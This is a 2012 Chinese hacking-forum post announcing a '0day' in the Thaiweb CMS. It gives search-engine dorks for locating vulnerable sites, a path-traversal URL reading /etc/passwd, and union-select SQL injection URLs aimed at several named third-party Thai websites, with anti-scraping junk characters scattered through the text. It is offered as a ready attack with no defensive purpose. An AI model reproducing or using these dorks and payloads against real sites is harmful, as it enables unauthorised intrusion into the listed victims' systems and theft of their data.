找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2632|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:) ?" l- n) E9 [7 r8 L

4 [; x( @, {. O6 O% n, Y' {intext:powered by Thaiweb
5 k0 a2 B8 a: K3 ~
- e' V" Z+ \( S3 u; h3 Dinurl:index.php?page=board.php
  D3 \, E& M! q& N" J3 Z% r* V1 Z, d$ ~. ?

& n  D9 e0 s. P0 R* |4 R) @3 c+ M# S
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd6 C1 }2 J! I- R' c. m) f1 u

: c  [& M: U* ^9 B3 f7 {  U
% \2 v( e& D6 [7 d8 ~% [! K1 _: z8 o, B2 U
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'$ ~0 ?7 h$ ^, n; n
- p0 X7 y9 X2 G# N( Y
' K! U4 G% d7 D* O( g

* X) x; h2 o* S4 p* ~3 ]& T; W1 ^* R& whttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--1 P0 H. ]- n, g4 J% T( X0 r8 g

- g# S" v8 N( \3 t3 s- K) uhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
- @/ T5 V* h* u3 }3 }6 u3 ]; m9 \# g! r
/ h3 K- Y1 u* `9 `http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--6 u  o9 F$ V8 p! E0 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表